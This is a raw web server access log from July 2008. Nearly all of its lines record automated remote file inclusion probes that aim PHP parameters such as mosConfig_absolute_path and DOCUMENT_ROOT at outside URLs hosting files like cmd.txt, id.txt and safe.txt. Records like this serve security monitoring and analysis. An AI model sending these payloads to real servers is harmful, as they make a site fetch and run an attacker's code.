75.0.18.81 - - [24/Jul/2008:06:56:28 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:57:07 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:57:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:57:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:57:25 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:57:25 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:06:57:30 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.126.172.166 - - [24/Jul/2008:06:58:03 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.172.166 - - [24/Jul/2008:06:58:07 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 200 18489 "-" "libwww-perl/5.805" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:06:58:28 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:58:40 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:58:40 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [24/Jul/2008:06:58:47 -0700] "GET /logs/access.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [24/Jul/2008:06:58:47 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:58:50 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:58:50 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:06:58:52 -0700] "GET /logs/index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:06:58:53 -0700] "GET /index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 200 18411 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
59.126.172.166 - - [24/Jul/2008:06:59:02 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.67.106 - - [24/Jul/2008:06:59:03 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [24/Jul/2008:06:59:03 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [24/Jul/2008:06:59:03 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:59:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.54.87 - - [24/Jul/2008:06:59:53 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.54.87 - - [24/Jul/2008:06:59:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.54.87 - - [24/Jul/2008:06:59:53 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:00:02 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:00:02 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:07:00:16 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:07:00:16 -0700] "GET /phphtml.php?htmlclass_path=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:07:00:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.126.172.166 - - [24/Jul/2008:07:00:16 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.54.87 - - [24/Jul/2008:07:00:28 -0700] "GET /logs/access_080315.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:00:32 -0700] "GET /logs/access.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:00:33 -0700] "GET /errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:00:33 -0700] "GET /logs/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:00:51 -0700] "GET /logs/access_080315.log//skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:01:48 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:01:48 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
193.201.54.87 - - [24/Jul/2008:07:01:59 -0700] "GET /logs/access_080313.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:07:02:15 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:07:02:24 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:07:02:27 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 200 18411 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:07:02:28 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:02:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:02:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:07:02:46 -0700] "GET /logs/access_080118.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:07:02:46 -0700] "GET /logs/access_080118.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.191.163 - - [24/Jul/2008:07:03:01 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:03:15 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:03:15 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
65.98.67.106 - - [24/Jul/2008:07:03:30 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:07:04:15 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.0.18.81 - - [24/Jul/2008:07:04:29 -0700] "GET //modify.php?dir_module=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
75.0.18.81 - - [24/Jul/2008:07:04:38 -0700] "GET /logs//modify.php?dir_module=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:04:44 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:04:44 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:05:55 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:05:55 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:05:57 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18519 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:06:01 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18481 "-" "libwww-perl/5.805" "www.dmulk.com"
201.218.250.106 - - [24/Jul/2008:07:06:12 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:06:16 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:06:16 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:07:06:19 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.191.163 - - [24/Jul/2008:07:06:37 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:07:44 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:07:44 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
86.57.255.65 - - [24/Jul/2008:07:08:02 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.pasote.net/m_pictures/dir/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.57.255.65 - - [24/Jul/2008:07:08:02 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.pasote.net/m_pictures/dir/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.57.255.65 - - [24/Jul/2008:07:08:02 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.pasote.net/m_pictures/dir/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:07:09:43 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:07:09:56 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.231.6 - - [24/Jul/2008:07:10:06 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.1" 200 1012 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:10:19 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:10:19 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:07:10:34 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:07:10:53 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.57.255.65 - - [24/Jul/2008:07:11:26 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.pasote.net/m_pictures/dir/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:11:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:11:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:11:51 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:11:51 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:12:10 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:12:10 -0700] "GET //components/com_flyspray/startdown.php?file=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:12:10 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:57 -0700] "GET /logs/access.log//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:57 -0700] "GET //index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:58 -0700] "GET /logs//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:58 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:58 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:58 -0700] "GET //index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:12:58 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:13:00 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 18473 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.43 - - [24/Jul/2008:07:13:01 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:07:13:09 -0700] "GET /logs/access_070721.log HTTP/1.0" 200 23814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:13:21 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:13:24 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:13:25 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:13:25 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:07:13:49 -0700] "GET /index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:16 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:14:25 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:14:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:14:27 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:14:30 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:14:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:30 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:33 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:14:33 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:14:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "dmulk.com"
